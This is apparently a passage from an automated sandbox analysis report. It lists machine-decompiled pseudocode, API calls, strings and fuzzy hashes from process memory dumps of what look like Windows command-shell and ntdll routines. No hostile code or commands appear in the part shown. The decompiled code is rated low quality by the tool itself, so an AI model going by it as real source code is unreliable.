                                    				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
                                    				 *_t37 = _t88 >> 0x18;
                                    				_t37[1] = _t88 >> 0x10;
                                    				_t37[6] = _t81 >> 8;
                                    				_t37[2] = _t88 >> 8;
                                    				_t37[3] = _t88;
                                    				return _t37;
                                    			}












                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

                                    Executed Functions

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0


                                    Non-executed Functions

                                    C-Code - Quality: 48%
                                    			E011F3506(void __ecx, signed int __edx, long _a4, DWORD* _a8) {
                                    				signed int _v8;
                                    				signed int _v16;
                                    				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
                                    				unsigned int _v36;
                                    				intOrPtr _v40;
                                    				unsigned int _v44;
                                    				intOrPtr _v50;
                                    				struct _CONSOLE_SCREEN_BUFFER_INFO _v56;
                                    				signed int _v68;
                                    				void* _v76;
                                    				void* _v80;
                                    				DWORD* _v84;
                                    				long _v88;
                                    				void* _v90;
                                    				signed int _v92;
                                    				int _v96;
                                    				void* _v100;
                                    				long _v108;
                                    				signed int _v112;
                                    				void* _v120;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				signed int _t83;
                                    				void* _t85;
                                    				int _t86;
                                    				int _t87;
                                    				int _t93;
                                    				signed int _t95;
                                    				void* _t99;
                                    				void* _t104;
                                    				void* _t105;
                                    				void _t106;
                                    				void _t107;
                                    				signed int _t108;
                                    				void* _t118;
                                    				void _t119;
                                    				signed int _t133;
                                    				signed int _t134;
                                    				void* _t141;
                                    				void* _t142;
                                    				long _t143;
                                    				void* _t147;
                                    				signed char _t149;
                                    				signed int _t152;
                                    				void* _t156;
                                    				signed int _t157;
                                    				void* _t159;
                                    				void* _t163;
                                    				void* _t168;
                                    				void* _t169;
                                    				int _t170;
                                    				void* _t177;
                                    				void* _t178;
                                    				void* _t181;
                                    				void* _t182;
                                    				void* _t184;
                                    				void* _t185;
                                    				DWORD* _t187;
                                    				void* _t189;
                                    				struct _COORD _t190;
                                    				signed int _t191;
                                    				signed int _t193;
                                    				void* _t196;
                                    				void* _t197;
                                    				void* _t206;
                                    				void* _t207;
                                    
                                    				_t173 = __edx;
                                    				_t193 = (_t191 & 0xfffffff8) - 0x54;
                                    				_t83 =  *0x11fd0b4; // 0x8c8bfe4f
                                    				_v8 = _t83 ^ _t193;
                                    				_t187 = _a8;
                                    				_t184 = __edx;
                                    				_v56.dwCursorPosition = __ecx;
                                    				_v80 = _t187;
                                    				_t85 = GetStdHandle(0xfffffff5);
                                    				_v76 = _t85;
                                    				if(_t85 == 0xffffffff) {
                                    					__imp___get_osfhandle(1);
                                    					_v76 = _t85;
                                    				}
                                    				if( *0x1213cc9 == 0) {
                                    					L66:
                                    					__imp__AcquireSRWLockShared(0x1217f20);
                                    					_t86 = ReadConsoleW(_v56.dwSize, _t184, _a4, _t187, 0);
                                    					__imp__ReleaseSRWLockShared(0x1217f20);
                                    					_t87 = _t86;
                                    				} else {
                                    					_t147 = 0x20;
                                    					_t196 =  *0x11fd0d8 - _t147; // 0x20
                                    					if(_t196 >= 0) {
                                    						goto L66;
                                    					} else {
                                    						_t197 =  *0x11fd0d4 - _t147; // 0x20
                                    						if(_t197 >= 0 || GetConsoleScreenBufferInfo(_t85,  &_v32) == 0) {
                                    							goto L66;
                                    						} else {
                                    							_t149 =  *0x11fd0d8; // 0x20
                                    							_t190 = _v32.dwCursorPosition;
                                    							_t142 = 0;
                                    							_t173 = 1 << _t149;
                                    							asm("bts edx, eax");
                                    							_v68 = _t190;
                                    							_v56.wAttributes = 0x10;
                                    							_v56.dwSize = 0;
                                    							_v44 = 0;
                                    							_v40 = 1;
                                    							_v36 = 0;
                                    							E011FB4DD( *0x11fd0d4 & 0x0000ffff);
                                    							 *0x11fd580 = 0;
                                    							 *0x11fd578 = 0;
                                    							 *0x11fd574 = 0;
                                    							 *0x11fd57c = 0;
                                    							while(1) {
                                    								L7:
                                    								__imp__AcquireSRWLockShared(0x1217f20);
                                    								_t93 = ReadConsoleW(_v56.dwSize, _t184, _a4, _v84,  &(_v56.dwCursorPosition));
                                    								_v92 = _t93;
                                    								__imp__ReleaseSRWLockShared(0x1217f20);
                                    								_v68 =  *_v88;
                                    								if( *0x11fd544 == 0) {
                                    									_t95 = 0;
                                    									__eflags = 0;
                                    								} else {
                                    									EnterCriticalSection( *0x1203858);
                                    									 *0x11fd544 = 0;
                                    									LeaveCriticalSection( *0x1203858);
                                    									if(_t142 != 0) {
                                    										RtlFreeHeap(GetProcessHeap(), 0, _t142);
                                    									}
                                    									_t95 = 0;
                                    									_t142 = 0;
                                    								}
                                    								if(_v96 == 0) {
                                    									break;
                                    								}
                                    								_t173 = _t173 | 0xffffffff;
                                    								_v92 = _v92 | 0xffffffff;
                                    								_v80 = _t95;
                                    								if( *_v88 <= 0) {
                                    									break;
                                    								} else {
                                    									while(1) {
                                    										_t152 =  *(_t184 + _t95 * 2) & 0x0000ffff;
                                    										if(_t152 == 0xd) {
                                    											break;
                                    										}
                                    										_t206 = _t152 -  *0x11fd0d8; // 0x20
                                    										if(_t206 == 0) {
                                    											_v92 = _t95;
                                    											goto L25;
                                    										} else {
                                    											_t207 = _t152 -  *0x11fd0d4; // 0x20
                                    											if(_t207 == 0) {
                                    												_v92 = _t95;
                                    												_v80 = 1;
                                    												L24:
                                    												__eflags = _t173 - 0xffffffff;
                                    												if(_t173 != 0xffffffff) {
                                    													goto L18;
                                    												} else {
                                    													L25:
                                    													__eflags = _t95 - 0xffffffff;
                                    													if(_t95 == 0xffffffff) {
                                    														goto L18;
                                    													} else {
                                    														 *_v88 = _t95;
                                    														 *(_t184 + _t95 * 2) = 0;
                                    														__eflags = _t142;
                                    														if(_t142 == 0) {
                                    															L35:
                                    															_v96 = 1;
                                    														} else {
                                    															_t169 = _t142;
                                    															_t133 = _t184;
                                    															while(1) {
                                    																_t181 =  *_t133;
                                    																__eflags = _t181 -  *_t169;
                                    																if(_t181 !=  *_t169) {
                                    																	break;
                                    																}
                                    																__eflags = _t181;
                                    																if(_t181 == 0) {
                                    																	L32:
                                    																	_t170 = 0;
                                    																	_t134 = 0;
                                    																} else {
                                    																	_t182 =  *((intOrPtr*)(_t133 + 2));
                                    																	__eflags = _t182 -  *((intOrPtr*)(_t169 + 2));
                                    																	if(_t182 !=  *((intOrPtr*)(_t169 + 2))) {
                                    																		break;
                                    																	} else {
                                    																		_t133 = _t133 + 4;
                                    																		_t169 = _t169 + 4;
                                    																		__eflags = _t182;
                                    																		if(_t182 != 0) {
                                    																			continue;
                                    																		} else {
                                    																			goto L32;
                                    																		}
                                    																	}
                                    																}
                                    																L34:
                                    																_v96 = _t170;
                                    																__eflags = _t134;
                                    																if(_t134 != 0) {
                                    																	goto L35;
                                    																}
                                    																goto L36;
                                    															}
                                    															asm("sbb eax, eax");
                                    															_t134 = _t133 | 0x00000001;
                                    															_t170 = 0;
                                    															__eflags = 0;
                                    															goto L34;
                                    														}
                                    														L36:
                                    														_t99 = _v80;
                                    														__eflags = _t99;
                                    														if(__eflags == 0) {
                                    															__eflags = _v92 - 2;
                                    															if(__eflags > 0) {
                                    																__imp___wcsnicmp(_t184, L"cd ", 3);
                                    																_t193 = _t193 + 0xc;
                                    																__eflags = _t99;
                                    																if(__eflags == 0) {
                                    																	L45:
                                    																	_t99 = 1;
                                    																} else {
                                    																	__imp___wcsnicmp(_t184, L"rd ", 3);
                                    																	_t193 = _t193 + 0xc;
                                    																	__eflags = _t99;
                                    																	if(__eflags == 0) {
                                    																		goto L45;
                                    																	} else {
                                    																		__imp___wcsnicmp(_t184, L"md ", 3);
                                    																		_t193 = _t193 + 0xc;
                                    																		__eflags = _t99;
                                    																		if(__eflags == 0) {
                                    																			goto L45;
                                    																		} else {
                                    																			__imp___wcsnicmp(_t184, L"chdir ", 6);
                                    																			_t193 = _t193 + 0xc;
                                    																			__eflags = _t99;
                                    																			if(__eflags == 0) {
                                    																				goto L45;
                                    																			} else {
                                    																				__imp___wcsnicmp(_t184, L"rmdir ", 6);
                                    																				_t193 = _t193 + 0xc;
                                    																				__eflags = _t99;
                                    																				if(__eflags == 0) {
                                    																					goto L45;
                                    																				} else {
                                    																					__imp___wcsnicmp(_t184, L"mkdir ", 6);
                                    																					_t193 = _t193 + 0xc;
                                    																					__eflags = _t99;
                                    																					if(__eflags == 0) {
                                    																						goto L45;
                                    																					} else {
                                    																						__imp___wcsnicmp(_t184, L"pushd ", 6);
                                    																						_t193 = _t193 + 0xc;
                                    																						__eflags = _t99;
                                    																						if(__eflags != 0) {
                                    																							_t99 = _v80;
                                    																						} else {
                                    																							goto L45;
                                    																						}
                                    																					}
                                    																				}
                                    																			}
                                    																		}
                                    																	}
                                    																}
                                    															}
                                    														}
                                    														_push(_v96);
                                    														_t155 = _t184;
                                    														_push(_t99);
                                    														_push( !(_v44 >> 4) & 0x00000001);
                                    														_push(_v92);
                                    														_t104 = E011FB2BF(_t142, _t184, _a4, _t184, _t190, __eflags);
                                    														__eflags = _t104;
                                    														if(_t104 == 0) {
                                    															_t105 = E011E7797(_t155);
                                    															__eflags = _t105;
                                    															if(_t105 != 0) {
                                    																 *0x121c014(0xffffffff);
                                    															}
                                    															_t156 = _t184;
                                    															_t73 = _t156 + 2; // 0xc
                                    															_t177 = _t73;
                                    															do {
                                    																_t106 =  *_t156;
                                    																_t156 = _t156 + 2;
                                    																__eflags = _t106 - _v80;
                                    															} while (_t106 != _v80);
                                    															_t157 = _t156 - _t177;
                                    															__eflags = _t157;
                                    															_v68 = _t157 >> 1;
                                    														} else {
                                    															E011F9897();
                                    															_t118 = GetConsoleScreenBufferInfo(_v100,  &_v56);
                                    															__eflags = _t118;
                                    															if(_t118 != 0) {
                                    																_t168 = _v50 - (_v92 + _v108) / _v56;
                                    																__eflags = _t168;
                                    																_v90 = _t168;
                                    																_t190 = _v92;
                                    															}
                                    															_t163 = _t184;
                                    															_t61 = _t163 + 2; // 0xc
                                    															_t178 = _t61;
                                    															do {
                                    																_t119 =  *_t163;
                                    																_t163 = _t163 + 2;
                                    																__eflags = _t119 - _v80;
                                    															} while (_t119 != _v80);
                                    															_v88 = _t163 - _t178 >> 1;
                                    															SetConsoleCursorPosition(_v100, _t190);
                                    															_push( &_v84);
                                    															_push(_t190);
                                    															_push(_v84);
                                    															_push(0x20);
                                    															_push(_v100);
                                    															FillConsoleOutputCharacterW();
                                    															WriteConsoleW(_v120, _t184, _v108,  &_v108, 0);
                                    															_v88 = _v108;
                                    															E011E06C0(_t163 - _t178 >> 1);
                                    														}
                                    														__eflags = _t142;
                                    														if(_t142 == 0) {
                                    															_t143 = 0;
                                    															__eflags = 0;
                                    														} else {
                                    															_t143 = 0;
                                    															RtlFreeHeap(GetProcessHeap(), 0, _t142);
                                    														}
                                    														_t159 = _t184;
                                    														_t76 = _t159 + 2; // 0xc
                                    														_t173 = _t76;
                                    														do {
                                    															_t107 =  *_t159;
                                    															_t159 = _t159 + 2;
                                    															__eflags = _t107 - _t143;
                                    														} while (_t107 != _t143);
                                    														_t77 = (_t159 - _t173 >> 1) + 1; // 0x9
                                    														_t108 = _t77;
                                    														_v112 = _t108;
                                    														_t142 = HeapAlloc(GetProcessHeap(), _t143, _t108 + _t108);
                                    														__eflags = _t142;
                                    														if(_t142 == 0) {
                                    															_t87 = 0;
                                    														} else {
                                    															_t173 = _v112;
                                    															E011E1040(_t142, _t173, _t184);
                                    															goto L7;
                                    														}
                                    													}
                                    												}
                                    											} else {
                                    												_t95 = _t95 + 1;
                                    												if(_t95 <  *_v88) {
                                    													continue;
                                    												} else {
                                    													goto L18;
                                    												}
                                    											}
                                    										}
                                    										goto L67;
                                    									}
                                    									_t173 = _t95;
                                    									_t95 = _v92;
                                    									goto L24;
                                    								}
                                    								goto L67;
                                    							}
                                    							L18:
                                    							if(_t142 != 0) {
                                    								RtlFreeHeap(GetProcessHeap(), 0, _t142);
                                    							}
                                    							_t87 = _v96;
                                    						}
                                    					}
                                    				}
                                    				L67:
                                    				_pop(_t185);
                                    				_pop(_t189);
                                    				_pop(_t141);
                                    				return E011E6FD0(_t87, _t141, _v16 ^ _t193, _t173, _t185, _t189);
                                    			}


                                    APIs
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,0000000A,00000000,00000001), ref: 011F352E
                                    • _get_osfhandle.MSVCRT ref: 011F353F
                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 011F357A
                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011F35E1
                                    • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,0000000A,?,?,00000010), ref: 011F35F8
                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011F3607
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011F3626
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011F3639
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 011F3647
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F364E
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 011F36A4
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F36AB
                                    • _wcsnicmp.MSVCRT ref: 011F3750
                                    • _wcsnicmp.MSVCRT ref: 011F3765
                                    • _wcsnicmp.MSVCRT ref: 011F377A
                                    • _wcsnicmp.MSVCRT ref: 011F378F
                                    • _wcsnicmp.MSVCRT ref: 011F37A4
                                    • _wcsnicmp.MSVCRT ref: 011F37B9
                                    • _wcsnicmp.MSVCRT ref: 011F37CE
                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,00000001,?), ref: 011F381A
                                    • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 011F3865
                                    • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00000020,?,?,?), ref: 011F387B
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,0000000A,?,?,00000000), ref: 011F3892
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 011F38DA
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F38E1
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000009,?,?,?,00000001), ref: 011F390A
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011F3911
                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011F3938
                                    • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,0000000A,?,?,00000000), ref: 011F3949
                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011F3952
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferCriticalInfoReadReleaseScreenSection$AllocCharacterCursorEnterFillHandleLeaveOutputPositionWrite_get_osfhandle
                                    • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                    • API String ID: 2991647268-3100821235
                                    • Opcode ID: 2f843f7b86870d9b13edaa71d5c6646b396032770ff09ef04dea9e27c5d9d60b
                                    • Instruction ID: 45fd8c7e27964852de64885f15b11fef0f8a65f405dab691c5ca65f65186337c
                                    • Opcode Fuzzy Hash: 2f843f7b86870d9b13edaa71d5c6646b396032770ff09ef04dea9e27c5d9d60b
                                    • Instruction Fuzzy Hash: 53C1D671614301AFDB28DF68E89CA6B7BE5FF98714F04492DFA66C2294DB31C581CB12
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 011E41A4: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(011D5BA1,0000001F,?,00000080), ref: 011E41A4
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001E,011FF81C,00000008,00000000,?), ref: 011E3FA8
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 011E3FC5
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 011E402A
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 011E406C
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,011FF80C,00000008), ref: 011E4094
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,011FF7A8,00000020), ref: 011E40AC
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,011FF768,00000020), ref: 011E40C4
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000033,011FF728,00000020), ref: 011E40DC
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000034,011FF6E8,00000020), ref: 011E40F4
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000035,011FF6A8,00000020), ref: 011E410C
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000036,011FF668,00000020), ref: 011E4124
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000037,011FF628,00000020), ref: 011E413C
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000E,011FF7FC,00000008), ref: 011E4154
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000F,011FF7E8,00000008), ref: 011E416C
                                    • setlocale.MSVCRT ref: 011E4181
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: InfoLocale$DefaultUsersetlocale
                                    • String ID: .OCP$1$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                    • API String ID: 1351325837-478706884
                                    • Opcode ID: af09c8423edd66751bac084db4a9282ea27db8f0ec520b16768e2fe59d3c0293
                                    • Instruction ID: 01d5c50c34bf41494f6a64a8ceedfd0b5577f7e0b08e51f19e1b576177d46185
                                    • Opcode Fuzzy Hash: af09c8423edd66751bac084db4a9282ea27db8f0ec520b16768e2fe59d3c0293
                                    • Instruction Fuzzy Hash: 39D12675702A029AEB3D8EB8890C7763AE5FF51644F14822DE612DA5C8EBB0C646C356
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000001,00000000,00000020,011FBDF8,00000108,011DC897,?,00000000,00000000,00000000), ref: 011E37A0
                                    • UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00060001,?,00000004,00000000,00000000,?,00000000,00000000,00000000), ref: 011E37CF
                                    • memset.MSVCRT ref: 011E37E7
                                    • memset.MSVCRT ref: 011E3840
                                    • GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000044), ref: 011E3853
                                      • Part of subcall function 011E3320: _wcsnicmp.MSVCRT ref: 011E33A4
                                    • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(00000000,\XCOPY.EXE), ref: 011E38AE
                                    • CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 011E38F8
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011E391A
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 011EDDE6
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 011EDE02
                                    • DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000000), ref: 011EDE1B
                                    • CreateProcessAsUserW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 011EDEAE
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011EDFCB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: AttributeProcThread$CloseCreateErrorHandleLastListProcessmemset$DeleteInfoInitializeStartupUpdateUser_wcsnicmplstrcmp
                                    • String ID: $%01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$D$H$\XCOPY.EXE
                                    • API String ID: 1603632292-3461277227
                                    • Opcode ID: d0212f88b018fa2c7bbe61fd571eaffbaab7243a03d1f4fe3e08752a976e5537
                                    • Instruction ID: 7396ef928c09472166a9c33fab79b4b2353d4f7010d55a68d293c9705eedfb2b
                                    • Opcode Fuzzy Hash: d0212f88b018fa2c7bbe61fd571eaffbaab7243a03d1f4fe3e08752a976e5537
                                    • Instruction Fuzzy Hash: E9C19570A106159EDF3CDBE9AC4CBAA7AF9BB55704F004099E619D7244EB708984CF52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    • The resource is owned exclusively by thread %p, xrefs: 03B1B374
                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 03B1B3D6
                                    • *** An Access Violation occurred in %ws:%s, xrefs: 03B1B48F
                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 03B1B323
                                    • *** enter .exr %p for the exception record, xrefs: 03B1B4F1
                                    • a NULL pointer, xrefs: 03B1B4E0
                                    • *** then kb to get the faulting stack, xrefs: 03B1B51C
                                    • *** Inpage error in %ws:%s, xrefs: 03B1B418
                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 03B1B53F
                                    • The instruction at %p tried to %s , xrefs: 03B1B4B6
                                    • This failed because of error %Ix., xrefs: 03B1B446
                                    • The instruction at %p referenced memory at %p., xrefs: 03B1B432
                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 03B1B2DC
                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 03B1B476
                                    • The critical section is owned by thread %p., xrefs: 03B1B3B9
                                    • <unknown>, xrefs: 03B1B27E, 03B1B2D1, 03B1B350, 03B1B399, 03B1B417, 03B1B48E
                                    • read from, xrefs: 03B1B4AD, 03B1B4B2
                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 03B1B2F3
                                    • Go determine why that thread has not released the critical section., xrefs: 03B1B3C5
                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 03B1B484
                                    • write to, xrefs: 03B1B4A6
                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 03B1B39B
                                    • The resource is owned shared by %d threads, xrefs: 03B1B37E
                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 03B1B314
                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 03B1B352
                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 03B1B38F
                                    • *** enter .cxr %p for the context, xrefs: 03B1B50D
                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 03B1B305
                                    • an invalid address, %p, xrefs: 03B1B4CF
                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 03B1B47D
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID:
                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                    • API String ID: 0-108210295
                                    • Opcode ID: 622ac52f99a8f0c8df7d8655cdb98ea1a3e03bda6b270a5b77fecbb50e632895
                                    • Instruction ID: e5f673f2af8aaedd415902d3ad7168ff80d93e1e29af54adfff2a0feb18b692a
                                    • Opcode Fuzzy Hash: 622ac52f99a8f0c8df7d8655cdb98ea1a3e03bda6b270a5b77fecbb50e632895
                                    • Instruction Fuzzy Hash: 2F81F139A40200FFCB21EB499C49D6E3F26EF87B59F8440A6F9046F212D3759561DBB2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID:
                                    • String ID: [...]$ [..]$ [.]$...$:
                                    • API String ID: 0-1980097535
                                    • Opcode ID: 176c60cbcccae4737d6721d0a1cf677c4dfcf800aeadb6879143fea61ea850c4
                                    • Instruction ID: ea77946fa626a114de49e8e16eda3abfc1c29951bf69ad6101efbe4a57f21a6c
                                    • Opcode Fuzzy Hash: 176c60cbcccae4737d6721d0a1cf677c4dfcf800aeadb6879143fea61ea850c4
                                    • Instruction Fuzzy Hash: C112D2702047029BDB2DDFA8C888AAFB7E5FF98704F04491DFA8597281EB30D945CB56
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 011E269C: _get_osfhandle.MSVCRT ref: 011E26A7
                                      • Part of subcall function 011E269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011DC5F8,?,?,?), ref: 011E26B6
                                      • Part of subcall function 011E269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26D2
                                      • Part of subcall function 011E269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000002), ref: 011E26E1
                                      • Part of subcall function 011E269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011E26EC
                                      • Part of subcall function 011E269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26F5
                                    • _get_osfhandle.MSVCRT ref: 011DC601
                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,011DC5C6,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011DC60F
